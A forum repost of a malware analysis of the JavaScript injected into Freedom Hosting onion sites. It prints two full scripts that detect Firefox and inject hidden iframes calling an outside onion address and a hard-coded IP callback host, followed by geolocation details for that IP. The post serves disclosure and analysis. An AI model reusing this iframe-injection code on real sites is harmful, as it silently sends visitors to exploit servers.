Jump to content
Fi8sVrs

Freedom Hosting FBI IFRAME Redirector Malware Script

Recommended Posts

  • Active Members

# MalwareMustDie!
# This is the malicious Javascript set codes injected to the Freedom Hosting site
# It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
#
# Original copy at: www.twitlonger.com/show/n_1rlo0uu
# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
# Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV

# MalwareMustDie!

# This is the malicious Javascript set codes injected to the Freedom Hosting site

# It contents the IFRAMER Malware method to redirect the victim to infector site, in url:

# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0

#

# Original copy at: www.twitlonger.com/show/n_1rlo0uu

# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!

# Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.

# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html

# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/

# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html

# Ref: http://www.twitlonger.com/show/n_1rlo0uu

# Ref: http://pastebin.com/bu2Ya0n6

# Ref: http://pastebin.com/pmGEj9bV

// Case 1

function createCookie(name,value,minutes) {

if (minutes) {

var date = new Date();

date.setTime(date.getTime()+(minutes*60*1000));

var expires = "; expires="+date.toGMTString();

}

else var expires = "";

document.cookie = name+"="+value+expires+"; path=/";

}

function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for(var i=0;i < ca.length;i++) {

var c = ca;

while (c.charAt(0)==' ') c = c.substring(1,c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);

}

return null;

}

function isFF() {

return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";

iframe.height = "5";

iframe.width = "*";

document.body.appendChild(iframe);

}

function format_quick() {

if ( ! readCookie("n_serv") ) {

createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);

updatify();

}

}

function isReady()

{

if ( document.readyState === "interactive" || document.readyState === "complete" ) {

if ( isFF() ) {

format_quick();

}

}

else

{

setTimeout(isReady, 250);

}

}

setTimeout(isReady, 250);

// Case 2

function createCookie(name, value, minutes) {

if (minutes) {

var date = new Date();

date.setTime(date.getTime() + (minutes * 60 * 1000));

var expires = "; expires=" + date.toGMTString();

} else var expires = "";

document.cookie = name + "=" + value + expires + "; path=/";

}

function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for (var i = 0; i < ca.length; i++) {

var c = ca;

while (c.charAt(0) == ' ') c = c.substring(1, c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);

}

return null;

}

function isFF() {

return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY

iframe.height = "5";

iframe.width = "*";

document.body.appendChild(iframe);

}

function freedomhost() {

if (!readCookie("n_serv")) {

createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);

updatify();

}

}

function isReady() {

if (document.readyState === "interactive" || document.readyState === "complete") {

if (isFF()) {

//window.alert(window.location + "Firefox Detected.")

freedomhost();

}

} else {

setTimeout(isReady, 250);

}

}

setTimeout(isReady, 250);

// Noted, same method,

// second script is w/IP info callback, contacting remote host as per marked (1)

IP Address: 65.222.202.53

City: Triadelphia

State or Region: West Virginia

Country: United States

ISP: Verizon Business

Latitude & Longitude: 40.0900-80.6220

Domain: verizonbusiness.com

ZIP Code: 26059

---

#MalwareMustDie! @unixfreaxjp

Source

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...